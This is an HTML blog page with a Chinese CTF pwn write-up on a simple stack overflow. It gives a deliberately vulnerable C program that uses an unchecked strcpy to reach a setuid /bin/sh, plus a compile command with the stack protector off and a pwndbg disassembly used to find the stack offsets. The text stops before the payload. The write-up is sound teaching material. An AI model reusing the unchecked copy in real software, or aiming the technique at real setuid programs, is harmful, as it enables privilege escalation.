

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon/warning.png">
  <link rel="icon" href="/img/icon/warning.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="K0rz3n">
  <meta name="keywords" content="">
  
    <meta name="description" content="题目：        代码：  123456789101112131415161718192021222324252627282930313233343536#include &lt;stdint.h&gt;#include &lt;unistd.h&gt;#define EXPECTED 0xdeadbeefdeadbeefint main(int argc, char **argv)&amp;#123">
<meta property="og:type" content="article">
<meta property="og:title" content="Simple Sstackoverflow">
<meta property="og:url" content="http://k0rz3n.com/2025/08/20/simple-stackoverflow/index.html">
<meta property="og:site_name" content="K0rz3n&#39;s Blog">
<meta property="og:description" content="题目：        代码：  123456789101112131415161718192021222324252627282930313233343536#include &lt;stdint.h&gt;#include &lt;unistd.h&gt;#define EXPECTED 0xdeadbeefdeadbeefint main(int argc, char **argv)&amp;#123">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://k0rz3n.com/challenge1.png">
<meta property="og:image" content="http://k0rz3n.com/challenge2.png">
<meta property="og:image" content="http://k0rz3n.com/challenge3.png">
<meta property="og:image" content="http://k0rz3n.com/checksec.png">
<meta property="og:image" content="http://k0rz3n.com/n-address.png">
<meta property="og:image" content="http://k0rz3n.com/rax.png">
<meta property="og:image" content="http://k0rz3n.com/result.png">
<meta property="og:image" content="http://k0rz3n.com/static-analysis.png">
<meta property="article:published_time" content="2025-08-20T13:01:36.000Z">
<meta property="article:modified_time" content="2025-08-20T13:27:18.883Z">
<meta property="article:author" content="K0rz3n">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://k0rz3n.com/challenge1.png">
  
  
  
  <title>Simple Sstackoverflow - K0rz3n&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/macpanel.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"k0rz3n.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 60vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>K0rz3n&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/banner/icemountain.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Simple Sstackoverflow"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-08-20 14:01" pubdate>
          August 20, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.7k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          14 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Simple Sstackoverflow</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="GE4xD">题目：</h2>




<p><img src="/./challenge1.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/./challenge2.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/./challenge3.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="fOMlb">代码：</h2>

<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdint.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> EXPECTED 0xdeadbeefdeadbeef</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span> **argv)</span></span><br><span class="hljs-function"></span>&#123;<br>        <span class="hljs-type">char</span> buf[<span class="hljs-number">64</span>];<br>        <span class="hljs-type">uint64_t</span> n = <span class="hljs-number">0x1337</span>;<br><br>        <span class="hljs-keyword">if</span> (argc != <span class="hljs-number">2</span>)<br>        &#123;<br>                <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Please supply a single argument\n&quot;</span>);<br>                <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>        &#125;<br><br>        <span class="hljs-built_in">strcpy</span>(buf, argv[<span class="hljs-number">1</span>]);<br><br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Expected value of n: %016lX\n&quot;</span>, EXPECTED);  <br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Actual value of n: %016lX\n&quot;</span>, n); <br>                                                   <br>        <span class="hljs-keyword">if</span> (n == EXPECTED)<br>        &#123;<br>                <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;You win!\n&quot;</span>);<br>        <span class="hljs-comment">// This prevents /bin/sh from dropping the privileges</span><br>        <span class="hljs-built_in">setreuid</span>(<span class="hljs-built_in">geteuid</span>(), <span class="hljs-built_in">geteuid</span>());<br>                <span class="hljs-built_in">system</span>(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>        &#125;<br>        <span class="hljs-keyword">else</span><br>        &#123;<br>                <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;You lose!\n&quot;</span>);<br>        &#125;<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<h2 id="wFAhW">分析</h2>
这里面使用了 strcpy 函数，并且没有校验用户输入的字符串长度，直接copy进入 buf 中，会导致缓冲区溢出的风险，从而覆盖 n 变量为我们想要的值

<blockquote>
<p>这里面有一个小的注意点，虽然这里面数组是比变量更早声明，但是实际上在地址分布中数组的地址更低，而数组是从低地址向高地址生长的，因此可以覆盖到更高地址的变量</p>
</blockquote>
<p>我们在本地使用 gcc 编译然后使用逆向工具对代码进行分析，找到两个变量的相对地址，从而构造我们的payload</p>
<p>文件下载并检查保护</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">scp pwn024@pwn.baectf.com:/home/pwn024/runme ./runme<br>checksec runme<br></code></pre></td></tr></table></figure>


<p><img src="/./checksec.png" srcset="/img/loading.gif" lazyload></p>
<p>查看文件平台 x86-64</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">ubuntu@VM-0-10-ubuntu:~/ctf/stackoverflow/ret2text$ file runme <br>runme: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ce0f1730a4b9bd7a58b681b3f691910d28da1a0a, not stripped<br></code></pre></td></tr></table></figure>

<h2 id="Tj5Oz">编译</h2>

<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cpp">gcc -fno-stack-protector -z noexecstack -g stack.c -o stack_pwn<br></code></pre></td></tr></table></figure>

<h2 id="MgceH">pwndbg</h2>

<p>命令可以参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/XiDP0/p/18445567">https://www.cnblogs.com/XiDP0/p/18445567</a></p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs applescript"><span class="hljs-built_in">file</span> ./stack_pwn<br>disassemble main<br></code></pre></td></tr></table></figure>

<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">Dump of assembler code for function main:<br>   <span class="hljs-number">0x00000000000011e9</span> &lt;+<span class="hljs-number">0</span>&gt;:     endbr64 <br>   <span class="hljs-number">0x00000000000011ed</span> &lt;+<span class="hljs-number">4</span>&gt;:     <span class="hljs-keyword">push</span>   <span class="hljs-built_in">rbp</span><br>   <span class="hljs-number">0x00000000000011ee</span> &lt;+<span class="hljs-number">5</span>&gt;:     <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rbp</span>,<span class="hljs-built_in">rsp</span><br>   <span class="hljs-number">0x00000000000011f1</span> &lt;+<span class="hljs-number">8</span>&gt;:     <span class="hljs-keyword">push</span>   <span class="hljs-built_in">rbx</span><br>   <span class="hljs-number">0x00000000000011f2</span> &lt;+<span class="hljs-number">9</span>&gt;:     <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">rsp</span>,<span class="hljs-number">0x68</span><br>   <span class="hljs-number">0x00000000000011f6</span> &lt;+<span class="hljs-number">13</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x64</span>],<span class="hljs-built_in">edi</span><br>   <span class="hljs-number">0x00000000000011f9</span> &lt;+<span class="hljs-number">16</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x70</span>],<span class="hljs-built_in">rsi</span><br>   <span class="hljs-number">0x00000000000011fd</span> &lt;+<span class="hljs-number">20</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x1337</span><br>   <span class="hljs-number">0x0000000000001205</span> &lt;+<span class="hljs-number">28</span>&gt;:    <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x64</span>],<span class="hljs-number">0x2</span><br>   <span class="hljs-number">0x0000000000001209</span> &lt;+<span class="hljs-number">32</span>&gt;:    <span class="hljs-keyword">je</span>     <span class="hljs-number">0x1224</span> &lt;main+<span class="hljs-number">59</span>&gt;<br>   <span class="hljs-number">0x000000000000120b</span> &lt;+<span class="hljs-number">34</span>&gt;:    <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rip</span>+<span class="hljs-number">0xdf6</span>]        # <span class="hljs-number">0x2008</span><br>   <span class="hljs-number">0x0000000000001212</span> &lt;+<span class="hljs-number">41</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x0000000000001215</span> &lt;+<span class="hljs-number">44</span>&gt;:    <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10b0</span> &lt;puts@plt&gt;<br>   <span class="hljs-number">0x000000000000121a</span> &lt;+<span class="hljs-number">49</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x1</span><br>   <span class="hljs-number">0x000000000000121f</span> &lt;+<span class="hljs-number">54</span>&gt;:    <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x12d8</span> &lt;main+<span class="hljs-number">239</span>&gt;<br>   <span class="hljs-number">0x0000000000001224</span> &lt;+<span class="hljs-number">59</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x70</span>]<br>   <span class="hljs-number">0x0000000000001228</span> &lt;+<span class="hljs-number">63</span>&gt;:    <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x8</span><br>   <span class="hljs-number">0x000000000000122c</span> &lt;+<span class="hljs-number">67</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]<br>   <span class="hljs-number">0x000000000000122f</span> &lt;+<span class="hljs-number">70</span>&gt;:    <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x60</span>]<br>   <span class="hljs-number">0x0000000000001233</span> &lt;+<span class="hljs-number">74</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">rdx</span><br>   <span class="hljs-number">0x0000000000001236</span> &lt;+<span class="hljs-number">77</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x0000000000001239</span> &lt;+<span class="hljs-number">80</span>&gt;:    <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10a0</span> &lt;strcpy@plt&gt;<br>   <span class="hljs-number">0x000000000000123e</span> &lt;+<span class="hljs-number">85</span>&gt;:    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0xdeadbeefdeadbeef</span><br>   <span class="hljs-number">0x0000000000001248</span> &lt;+<span class="hljs-number">95</span>&gt;:    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x000000000000124b</span> &lt;+<span class="hljs-number">98</span>&gt;:    <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rip</span>+<span class="hljs-number">0xdd6</span>]        # <span class="hljs-number">0x2028</span><br>   <span class="hljs-number">0x0000000000001252</span> &lt;+<span class="hljs-number">105</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x0000000000001255</span> &lt;+<span class="hljs-number">108</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x0</span><br>   <span class="hljs-number">0x000000000000125a</span> &lt;+<span class="hljs-number">113</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10d0</span> &lt;printf@plt&gt;<br>   <span class="hljs-number">0x000000000000125f</span> &lt;+<span class="hljs-number">118</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>]<br>   <span class="hljs-number">0x0000000000001263</span> &lt;+<span class="hljs-number">122</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x0000000000001266</span> &lt;+<span class="hljs-number">125</span>&gt;:   <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rip</span>+<span class="hljs-number">0xdd8</span>]        # <span class="hljs-number">0x2045</span><br>   <span class="hljs-number">0x000000000000126d</span> &lt;+<span class="hljs-number">132</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x0000000000001270</span> &lt;+<span class="hljs-number">135</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x0</span><br>   <span class="hljs-number">0x0000000000001275</span> &lt;+<span class="hljs-number">140</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10d0</span> &lt;printf@plt&gt;<br>   <span class="hljs-number">0x000000000000127a</span> &lt;+<span class="hljs-number">145</span>&gt;:   movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0xdeadbeefdeadbeef</span><br>   <span class="hljs-number">0x0000000000001284</span> &lt;+<span class="hljs-number">155</span>&gt;:   <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x0000000000001288</span> &lt;+<span class="hljs-number">159</span>&gt;:   <span class="hljs-keyword">jne</span>    <span class="hljs-number">0x12c4</span> &lt;main+<span class="hljs-number">219</span>&gt;<br>   <span class="hljs-number">0x000000000000128a</span> &lt;+<span class="hljs-number">161</span>&gt;:   <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rip</span>+<span class="hljs-number">0xdcf</span>]        # <span class="hljs-number">0x2060</span><br>   <span class="hljs-number">0x0000000000001291</span> &lt;+<span class="hljs-number">168</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x0000000000001294</span> &lt;+<span class="hljs-number">171</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10b0</span> &lt;puts@plt&gt;<br>   <span class="hljs-number">0x0000000000001299</span> &lt;+<span class="hljs-number">176</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10e0</span> &lt;geteuid@plt&gt;<br>   <span class="hljs-number">0x000000000000129e</span> &lt;+<span class="hljs-number">181</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">ebx</span>,<span class="hljs-built_in">eax</span><br>   <span class="hljs-number">0x00000000000012a0</span> &lt;+<span class="hljs-number">183</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10e0</span> &lt;geteuid@plt&gt;<br>   <span class="hljs-number">0x00000000000012a5</span> &lt;+<span class="hljs-number">188</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">esi</span>,<span class="hljs-built_in">ebx</span><br>   <span class="hljs-number">0x00000000000012a7</span> &lt;+<span class="hljs-number">190</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edi</span>,<span class="hljs-built_in">eax</span><br>   <span class="hljs-number">0x00000000000012a9</span> &lt;+<span class="hljs-number">192</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10f0</span> &lt;setreuid@plt&gt;<br>   <span class="hljs-number">0x00000000000012ae</span> &lt;+<span class="hljs-number">197</span>&gt;:   <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rip</span>+<span class="hljs-number">0xdb4</span>]        # <span class="hljs-number">0x2069</span><br>   <span class="hljs-number">0x00000000000012b5</span> &lt;+<span class="hljs-number">204</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x00000000000012b8</span> &lt;+<span class="hljs-number">207</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x0</span><br>   <span class="hljs-number">0x00000000000012bd</span> &lt;+<span class="hljs-number">212</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10c0</span> &lt;system@plt&gt;<br>   <span class="hljs-number">0x00000000000012c2</span> &lt;+<span class="hljs-number">217</span>&gt;:   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x12d3</span> &lt;main+<span class="hljs-number">234</span>&gt;<br>   <span class="hljs-number">0x00000000000012c4</span> &lt;+<span class="hljs-number">219</span>&gt;:   <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rip</span>+<span class="hljs-number">0xda6</span>]        # <span class="hljs-number">0x2071</span><br>   <span class="hljs-number">0x00000000000012cb</span> &lt;+<span class="hljs-number">226</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rax</span><br>   <span class="hljs-number">0x00000000000012ce</span> &lt;+<span class="hljs-number">229</span>&gt;:   <span class="hljs-keyword">call</span>   <span class="hljs-number">0x10b0</span> &lt;puts@plt&gt;<br>   <span class="hljs-number">0x00000000000012d3</span> &lt;+<span class="hljs-number">234</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x0</span><br>   <span class="hljs-number">0x00000000000012d8</span> &lt;+<span class="hljs-number">239</span>&gt;:   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rbx</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>]<br>   <span class="hljs-number">0x00000000000012dc</span> &lt;+<span class="hljs-number">243</span>&gt;:   <span class="hljs-keyword">leave</span>  <br>   <span class="hljs-number">0x00000000000012dd</span> &lt;+<span class="hljs-number">244</span>&gt;:   <span class="hljs-keyword">ret</span>    <br>End of assembler dump.<br></code></pre></td></tr></table></figure>

<p>我们找一下 变量 n 的地址在哪，很明显，根据赋值0x1337 知道 rbp-0x18 就是 n的地址</p>
<p><img src="/./n-address.png" srcset="/img/loading.gif" lazyload></p>
<p>我们重点看 strcopy 从而可以定位到 buf 的地址，通常函数的第一个参数存储在 edi 第二个参数存储在 esi, 因此我们知道 rax 的地址就是 rdi, rbp-0x60 就是 buf 的地址</p>
<p><img src="/./rax.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">这里补充一下汇编相关的知识：<br>关于 [] 在汇编中的作用有两个，一个是地址的解引用，也就是说取方框内的地址中存储的值，另一个就是表示地址的运算，具体使用场景根据运算符号的不同有不同的要求，例如 <span class="hljs-keyword">mov</span> 和 <span class="hljs-keyword">lea</span> 对待这个符号的理解是不同的<br>解引用：当你需要从某个地址加载数据时，[] 表示内存解引用。比如在 <span class="hljs-keyword">mov</span> <span class="hljs-built_in">rax</span>, [<span class="hljs-built_in">rbx</span>] 中，<span class="hljs-built_in">rbx</span> 是一个地址，[<span class="hljs-built_in">rbx</span>] 表示加载该地址处的内容。<br>计算地址：当你需要计算一个地址并将其存储在寄存器中时，[] 不进行内存访问，而是计算出一个新的地址。比如在 <span class="hljs-keyword">lea</span> <span class="hljs-built_in">rax</span>, [<span class="hljs-built_in">rbx</span>+<span class="hljs-number">8</span>] 中，<span class="hljs-built_in">rbx</span>+<span class="hljs-number">8</span> 是一个新的地址，通过 <span class="hljs-keyword">lea</span> 指令将这个地址加载到寄存器中。<br></code></pre></td></tr></table></figure>


<p>接下来我么就是计算变量之间的距离，从而构造我们的payload</p>
